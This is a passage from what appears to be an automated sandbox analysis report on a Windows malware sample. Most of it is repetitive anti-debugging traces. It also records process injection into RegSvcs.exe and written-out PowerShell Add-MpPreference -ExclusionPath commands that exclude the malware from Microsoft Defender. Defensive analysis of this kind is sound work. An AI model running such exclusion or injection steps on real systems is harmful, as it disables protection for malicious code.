                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01740274 mov eax, dword ptr fs:[00000030h]10_2_01740274
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01740274 mov eax, dword ptr fs:[00000030h]10_2_01740274
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01740274 mov eax, dword ptr fs:[00000030h]10_2_01740274
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0168826B mov eax, dword ptr fs:[00000030h]10_2_0168826B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01694260 mov eax, dword ptr fs:[00000030h]10_2_01694260
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01694260 mov eax, dword ptr fs:[00000030h]10_2_01694260
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01694260 mov eax, dword ptr fs:[00000030h]10_2_01694260
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0174A250 mov eax, dword ptr fs:[00000030h]10_2_0174A250
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0174A250 mov eax, dword ptr fs:[00000030h]10_2_0174A250
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0176625D mov eax, dword ptr fs:[00000030h]10_2_0176625D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01696259 mov eax, dword ptr fs:[00000030h]10_2_01696259
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01718243 mov eax, dword ptr fs:[00000030h]10_2_01718243
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01718243 mov ecx, dword ptr fs:[00000030h]10_2_01718243
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0168A250 mov eax, dword ptr fs:[00000030h]10_2_0168A250
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0168823B mov eax, dword ptr fs:[00000030h]10_2_0168823B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_016A02E1 mov eax, dword ptr fs:[00000030h]10_2_016A02E1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_016A02E1 mov eax, dword ptr fs:[00000030h]10_2_016A02E1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_016A02E1 mov eax, dword ptr fs:[00000030h]10_2_016A02E1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_017662D6 mov eax, dword ptr fs:[00000030h]10_2_017662D6
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0169A2C3 mov eax, dword ptr fs:[00000030h]10_2_0169A2C3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0169A2C3 mov eax, dword ptr fs:[00000030h]10_2_0169A2C3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0169A2C3 mov eax, dword ptr fs:[00000030h]10_2_0169A2C3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0169A2C3 mov eax, dword ptr fs:[00000030h]10_2_0169A2C3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0169A2C3 mov eax, dword ptr fs:[00000030h]10_2_0169A2C3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_016A02A0 mov eax, dword ptr fs:[00000030h]10_2_016A02A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_016A02A0 mov eax, dword ptr fs:[00000030h]10_2_016A02A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_017262A0 mov eax, dword ptr fs:[00000030h]10_2_017262A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_017262A0 mov ecx, dword ptr fs:[00000030h]10_2_017262A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_017262A0 mov eax, dword ptr fs:[00000030h]10_2_017262A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_017262A0 mov eax, dword ptr fs:[00000030h]10_2_017262A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_017262A0 mov eax, dword ptr fs:[00000030h]10_2_017262A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_017262A0 mov eax, dword ptr fs:[00000030h]10_2_017262A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_016CE284 mov eax, dword ptr fs:[00000030h]10_2_016CE284
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_016CE284 mov eax, dword ptr fs:[00000030h]10_2_016CE284
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01710283 mov eax, dword ptr fs:[00000030h]10_2_01710283
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01710283 mov eax, dword ptr fs:[00000030h]10_2_01710283
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01710283 mov eax, dword ptr fs:[00000030h]10_2_01710283
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_016C656A mov eax, dword ptr fs:[00000030h]10_2_016C656A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_016C656A mov eax, dword ptr fs:[00000030h]10_2_016C656A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_016C656A mov eax, dword ptr fs:[00000030h]10_2_016C656A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01698550 mov eax, dword ptr fs:[00000030h]10_2_01698550
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01698550 mov eax, dword ptr fs:[00000030h]10_2_01698550
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_016BE53E mov eax, dword ptr fs:[00000030h]10_2_016BE53E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_016BE53E mov eax, dword ptr fs:[00000030h]10_2_016BE53E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_016BE53E mov eax, dword ptr fs:[00000030h]10_2_016BE53E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_016BE53E mov eax, dword ptr fs:[00000030h]10_2_016BE53E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_016BE53E mov eax, dword ptr fs:[00000030h]10_2_016BE53E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_016A0535 mov eax, dword ptr fs:[00000030h]10_2_016A0535
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_016A0535 mov eax, dword ptr fs:[00000030h]10_2_016A0535
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_016A0535 mov eax, dword ptr fs:[00000030h]10_2_016A0535
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_016A0535 mov eax, dword ptr fs:[00000030h]10_2_016A0535
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_016A0535 mov eax, dword ptr fs:[00000030h]10_2_016A0535
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_016A0535 mov eax, dword ptr fs:[00000030h]10_2_016A0535
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01726500 mov eax, dword ptr fs:[00000030h]10_2_01726500
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01764500 mov eax, dword ptr fs:[00000030h]10_2_01764500
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01764500 mov eax, dword ptr fs:[00000030h]10_2_01764500
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01764500 mov eax, dword ptr fs:[00000030h]10_2_01764500
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01764500 mov eax, dword ptr fs:[00000030h]10_2_01764500
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01764500 mov eax, dword ptr fs:[00000030h]10_2_01764500
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01764500 mov eax, dword ptr fs:[00000030h]10_2_01764500
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01764500 mov eax, dword ptr fs:[00000030h]10_2_01764500
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_016CC5ED mov eax, dword ptr fs:[00000030h]10_2_016CC5ED
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_016CC5ED mov eax, dword ptr fs:[00000030h]10_2_016CC5ED
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_016925E0 mov eax, dword ptr fs:[00000030h]10_2_016925E0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_016BE5E7 mov eax, dword ptr fs:[00000030h]10_2_016BE5E7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_016BE5E7 mov eax, dword ptr fs:[00000030h]10_2_016BE5E7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_016BE5E7 mov eax, dword ptr fs:[00000030h]10_2_016BE5E7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_016BE5E7 mov eax, dword ptr fs:[00000030h]10_2_016BE5E7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_016BE5E7 mov eax, dword ptr fs:[00000030h]10_2_016BE5E7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_016BE5E7 mov eax, dword ptr fs:[00000030h]10_2_016BE5E7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_016BE5E7 mov eax, dword ptr fs:[00000030h]10_2_016BE5E7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_016BE5E7 mov eax, dword ptr fs:[00000030h]10_2_016BE5E7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_016CE5CF mov eax, dword ptr fs:[00000030h]10_2_016CE5CF
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_016CE5CF mov eax, dword ptr fs:[00000030h]10_2_016CE5CF
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_016965D0 mov eax, dword ptr fs:[00000030h]10_2_016965D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_016CA5D0 mov eax, dword ptr fs:[00000030h]10_2_016CA5D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_016CA5D0 mov eax, dword ptr fs:[00000030h]10_2_016CA5D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_017105A7 mov eax, dword ptr fs:[00000030h]10_2_017105A7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_017105A7 mov eax, dword ptr fs:[00000030h]10_2_017105A7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_017105A7 mov eax, dword ptr fs:[00000030h]10_2_017105A7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_016B45B1 mov eax, dword ptr fs:[00000030h]10_2_016B45B1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_016B45B1 mov eax, dword ptr fs:[00000030h]10_2_016B45B1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_016C4588 mov eax, dword ptr fs:[00000030h]10_2_016C4588
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01692582 mov eax, dword ptr fs:[00000030h]10_2_01692582
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01692582 mov ecx, dword ptr fs:[00000030h]10_2_01692582
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_016CE59C mov eax, dword ptr fs:[00000030h]10_2_016CE59C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0171C460 mov ecx, dword ptr fs:[00000030h]10_2_0171C460
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_016BA470 mov eax, dword ptr fs:[00000030h]10_2_016BA470
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_016BA470 mov eax, dword ptr fs:[00000030h]10_2_016BA470
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_016BA470 mov eax, dword ptr fs:[00000030h]10_2_016BA470
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0174A456 mov eax, dword ptr fs:[00000030h]10_2_0174A456
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_016CE443 mov eax, dword ptr fs:[00000030h]10_2_016CE443
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_016CE443 mov eax, dword ptr fs:[00000030h]10_2_016CE443
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_016CE443 mov eax, dword ptr fs:[00000030h]10_2_016CE443
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_016CE443 mov eax, dword ptr fs:[00000030h]10_2_016CE443
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_016CE443 mov eax, dword ptr fs:[00000030h]10_2_016CE443
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_016CE443 mov eax, dword ptr fs:[00000030h]10_2_016CE443
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_016CE443 mov eax, dword ptr fs:[00000030h]10_2_016CE443
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_016CE443 mov eax, dword ptr fs:[00000030h]10_2_016CE443
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_016B245A mov eax, dword ptr fs:[00000030h]10_2_016B245A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0168645D mov eax, dword ptr fs:[00000030h]10_2_0168645D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0168E420 mov eax, dword ptr fs:[00000030h]10_2_0168E420
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0168E420 mov eax, dword ptr fs:[00000030h]10_2_0168E420
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0168E420 mov eax, dword ptr fs:[00000030h]10_2_0168E420
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0168C427 mov eax, dword ptr fs:[00000030h]10_2_0168C427
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01716420 mov eax, dword ptr fs:[00000030h]10_2_01716420
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01716420 mov eax, dword ptr fs:[00000030h]10_2_01716420
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01716420 mov eax, dword ptr fs:[00000030h]10_2_01716420
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01716420 mov eax, dword ptr fs:[00000030h]10_2_01716420
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01716420 mov eax, dword ptr fs:[00000030h]10_2_01716420
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01716420 mov eax, dword ptr fs:[00000030h]10_2_01716420
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01716420 mov eax, dword ptr fs:[00000030h]10_2_01716420
                Source: C:\Users\user\Desktop\MN1qo2qaJmEvXDP.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Users\user\Desktop\MN1qo2qaJmEvXDP.exeMemory allocated: page read and write | page guardJump to behavior

                HIPS / PFW / Operating System Protection Evasion

                Source: C:\Users\user\Desktop\MN1qo2qaJmEvXDP.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\MN1qo2qaJmEvXDP.exe"
                Source: C:\Users\user\Desktop\MN1qo2qaJmEvXDP.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\rlJvZXSinaRi.exe"
                Source: C:\Users\user\Desktop\MN1qo2qaJmEvXDP.exe | Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 protect: page execute and read and write
                Source: C:\Users\user\AppData\Roaming\rlJvZXSinaRi.exe | Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 protect: page execute and read and write
                Source: C:\Program Files (x86)\JycEzTeMQKrLvqFdrvzCnnBkVuTlFGdDUiXjvDhFdgdDsdwSNLmkiipnYhjsmfsEUTowhpegZNOxJo\aDvThgRLSEMTIq.exe | NtQueryInformationProcess: Direct from: 0x77392C26
                Source: C:\Program Files (x86)\JycEzTeMQKrLvqFdrvzCnnBkVuTlFGdDUiXjvDhFdgdDsdwSNLmkiipnYhjsmfsEUTowhpegZNOxJo\aDvThgRLSEMTIq.exe | NtResumeThread: Direct from: 0x77392FBC
                Source: C:\Program Files (x86)\JycEzTeMQKrLvqFdrvzCnnBkVuTlFGdDUiXjvDhFdgdDsdwSNLmkiipnYhjsmfsEUTowhpegZNOxJo\aDvThgRLSEMTIq.exe | NtWriteVirtualMemory: Direct from: 0x7739490C
                Source: C:\Program Files (x86)\JycEzTeMQKrLvqFdrvzCnnBkVuTlFGdDUiXjvDhFdgdDsdwSNLmkiipnYhjsmfsEUTowhpegZNOxJo\aDvThgRLSEMTIq.exe | NtCreateUserProcess: Direct from: 0x7739371C
                Source: C:\Program Files (x86)\JycEzTeMQKrLvqFdrvzCnnBkVuTlFGdDUiXjvDhFdgdDsdwSNLmkiipnYhjsmfsEUTowhpegZNOxJo\aDvThgRLSEMTIq.exe | NtAllocateVirtualMemory: Direct from: 0x77392BFC
                Source: C:\Program Files (x86)\JycEzTeMQKrLvqFdrvzCnnBkVuTlFGdDUiXjvDhFdgdDsdwSNLmkiipnYhjsmfsEUTowhpegZNOxJo\aDvThgRLSEMTIq.exe | NtQuerySystemInformation: Direct from: 0x77392DFC
                Source: C:\Program Files (x86)\JycEzTeMQKrLvqFdrvzCnnBkVuTlFGdDUiXjvDhFdgdDsdwSNLmkiipnYhjsmfsEUTowhpegZNOxJo\aDvThgRLSEMTIq.exe | NtReadFile: Direct from: 0x77392ADC
                Source: C:\Program Files (x86)\JycEzTeMQKrLvqFdrvzCnnBkVuTlFGdDUiXjvDhFdgdDsdwSNLmkiipnYhjsmfsEUTowhpegZNOxJo\aDvThgRLSEMTIq.exe | NtProtectVirtualMemory: Direct from: 0x77387B2E
                Source: C:\Program Files (x86)\JycEzTeMQKrLvqFdrvzCnnBkVuTlFGdDUiXjvDhFdgdDsdwSNLmkiipnYhjsmfsEUTowhpegZNOxJo\aDvThgRLSEMTIq.exe | NtDelayExecution: Direct from: 0x77392DDC
                Source: C:\Program Files (x86)\JycEzTeMQKrLvqFdrvzCnnBkVuTlFGdDUiXjvDhFdgdDsdwSNLmkiipnYhjsmfsEUTowhpegZNOxJo\aDvThgRLSEMTIq.exe | NtWriteVirtualMemory: Direct from: 0x77392E3C
                Source: C:\Program Files (x86)\JycEzTeMQKrLvqFdrvzCnnBkVuTlFGdDUiXjvDhFdgdDsdwSNLmkiipnYhjsmfsEUTowhpegZNOxJo\aDvThgRLSEMTIq.exe | NtCreateMutant: Direct from: 0x773935CC
                Source: C:\Program Files (x86)\JycEzTeMQKrLvqFdrvzCnnBkVuTlFGdDUiXjvDhFdgdDsdwSNLmkiipnYhjsmfsEUTowhpegZNOxJo\aDvThgRLSEMTIq.exe | NtResumeThread: Direct from: 0x773936AC
                Source: C:\Program Files (x86)\JycEzTeMQKrLvqFdrvzCnnBkVuTlFGdDUiXjvDhFdgdDsdwSNLmkiipnYhjsmfsEUTowhpegZNOxJo\aDvThgRLSEMTIq.exe | NtMapViewOfSection: Direct from: 0x77392D1C
                Source: C:\Program Files (x86)\JycEzTeMQKrLvqFdrvzCnnBkVuTlFGdDUiXjvDhFdgdDsdwSNLmkiipnYhjsmfsEUTowhpegZNOxJo\aDvThgRLSEMTIq.exe | NtOpenKeyEx: Direct from: 0x77392B9C
                Source: C:\Program Files (x86)\JycEzTeMQKrLvqFdrvzCnnBkVuTlFGdDUiXjvDhFdgdDsdwSNLmkiipnYhjsmfsEUTowhpegZNOxJo\aDvThgRLSEMTIq.exe | NtSetInformationProcess: Direct from: 0x77392C5C
                Source: C:\Program Files (x86)\JycEzTeMQKrLvqFdrvzCnnBkVuTlFGdDUiXjvDhFdgdDsdwSNLmkiipnYhjsmfsEUTowhpegZNOxJo\aDvThgRLSEMTIq.exe | NtProtectVirtualMemory: Direct from: 0x77392F9C
                Source: C:\Program Files (x86)\JycEzTeMQKrLvqFdrvzCnnBkVuTlFGdDUiXjvDhFdgdDsdwSNLmkiipnYhjsmfsEUTowhpegZNOxJo\aDvThgRLSEMTIq.exe | NtNotifyChangeKey: Direct from: 0x77393C2C
                Source: C:\Program Files (x86)\JycEzTeMQKrLvqFdrvzCnnBkVuTlFGdDUiXjvDhFdgdDsdwSNLmkiipnYhjsmfsEUTowhpegZNOxJo\aDvThgRLSEMTIq.exe | NtQueryInformationToken: Direct from: 0x77392CAC
                Source: C:\Program Files (x86)\JycEzTeMQKrLvqFdrvzCnnBkVuTlFGdDUiXjvDhFdgdDsdwSNLmkiipnYhjsmfsEUTowhpegZNOxJo\aDvThgRLSEMTIq.exe | NtCreateFile: Direct from: 0x77392FEC
                Source: C:\Program Files (x86)\JycEzTeMQKrLvqFdrvzCnnBkVuTlFGdDUiXjvDhFdgdDsdwSNLmkiipnYhjsmfsEUTowhpegZNOxJo\aDvThgRLSEMTIq.exe | NtOpenFile: Direct from: 0x77392DCC
                Source: C:\Program Files (x86)\JycEzTeMQKrLvqFdrvzCnnBkVuTlFGdDUiXjvDhFdgdDsdwSNLmkiipnYhjsmfsEUTowhpegZNOxJo\aDvThgRLSEMTIq.exe | NtTerminateThread: Direct from: 0x77392FCC
                Source: C:\Program Files (x86)\JycEzTeMQKrLvqFdrvzCnnBkVuTlFGdDUiXjvDhFdgdDsdwSNLmkiipnYhjsmfsEUTowhpegZNOxJo\aDvThgRLSEMTIq.exe | NtDeviceIoControlFile: Direct from: 0x77392AEC
                Source: C:\Program Files (x86)\JycEzTeMQKrLvqFdrvzCnnBkVuTlFGdDUiXjvDhFdgdDsdwSNLmkiipnYhjsmfsEUTowhpegZNOxJo\aDvThgRLSEMTIq.exe | NtAllocateVirtualMemory: Direct from: 0x77392BEC
                Source: C:\Program Files (x86)\JycEzTeMQKrLvqFdrvzCnnBkVuTlFGdDUiXjvDhFdgdDsdwSNLmkiipnYhjsmfsEUTowhpegZNOxJo\aDvThgRLSEMTIq.exe | NtQuerySystemInformation: Direct from: 0x773948CC
                Source: C:\Program Files (x86)\JycEzTeMQKrLvqFdrvzCnnBkVuTlFGdDUiXjvDhFdgdDsdwSNLmkiipnYhjsmfsEUTowhpegZNOxJo\aDvThgRLSEMTIq.exe | NtQueryVolumeInformationFile: Direct from: 0x77392F2C
                Source: C:\Program Files (x86)\JycEzTeMQKrLvqFdrvzCnnBkVuTlFGdDUiXjvDhFdgdDsdwSNLmkiipnYhjsmfsEUTowhpegZNOxJo\aDvThgRLSEMTIq.exe | NtAllocateVirtualMemory: Direct from: 0x773948EC
                Source: C:\Program Files (x86)\JycEzTeMQKrLvqFdrvzCnnBkVuTlFGdDUiXjvDhFdgdDsdwSNLmkiipnYhjsmfsEUTowhpegZNOxJo\aDvThgRLSEMTIq.exe | NtOpenSection: Direct from: 0x77392E0C
                Source: C:\Program Files (x86)\JycEzTeMQKrLvqFdrvzCnnBkVuTlFGdDUiXjvDhFdgdDsdwSNLmkiipnYhjsmfsEUTowhpegZNOxJo\aDvThgRLSEMTIq.exe | NtAllocateVirtualMemory: Direct from: 0x77393C9C
                Source: C:\Program Files (x86)\JycEzTeMQKrLvqFdrvzCnnBkVuTlFGdDUiXjvDhFdgdDsdwSNLmkiipnYhjsmfsEUTowhpegZNOxJo\aDvThgRLSEMTIq.exe | NtSetInformationThread: Direct from: 0x773863F9
                Source: C:\Program Files (x86)\JycEzTeMQKrLvqFdrvzCnnBkVuTlFGdDUiXjvDhFdgdDsdwSNLmkiipnYhjsmfsEUTowhpegZNOxJo\aDvThgRLSEMTIq.exe | NtClose: Direct from: 0x77392B6C
                Source: C:\Program Files (x86)\JycEzTeMQKrLvqFdrvzCnnBkVuTlFGdDUiXjvDhFdgdDsdwSNLmkiipnYhjsmfsEUTowhpegZNOxJo\aDvThgRLSEMTIq.exe | NtSetInformationThread: Direct from: 0x77392B4C
                Source: C:\Program Files (x86)\JycEzTeMQKrLvqFdrvzCnnBkVuTlFGdDUiXjvDhFdgdDsdwSNLmkiipnYhjsmfsEUTowhpegZNOxJo\aDvThgRLSEMTIq.exe | NtReadVirtualMemory: Direct from: 0x77392E8C
                Source: C:\Program Files (x86)\JycEzTeMQKrLvqFdrvzCnnBkVuTlFGdDUiXjvDhFdgdDsdwSNLmkiipnYhjsmfsEUTowhpegZNOxJo\aDvThgRLSEMTIq.exe | NtCreateKey: Direct from: 0x77392C6C
                Source: C:\Program Files (x86)\JycEzTeMQKrLvqFdrvzCnnBkVuTlFGdDUiXjvDhFdgdDsdwSNLmkiipnYhjsmfsEUTowhpegZNOxJo\aDvThgRLSEMTIq.exe | NtQueryAttributesFile: Direct from: 0x77392E6C
                Source: C:\Users\user\Desktop\MN1qo2qaJmEvXDP.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 value starts with: 4D5A
                Source: C:\Users\user\AppData\Roaming\rlJvZXSinaRi.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 value starts with: 4D5A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Section loaded: NULL target: C:\Program Files (x86)\JycEzTeMQKrLvqFdrvzCnnBkVuTlFGdDUiXjvDhFdgdDsdwSNLmkiipnYhjsmfsEUTowhpegZNOxJo\aDvThgRLSEMTIq.exe protection: execute and read and write
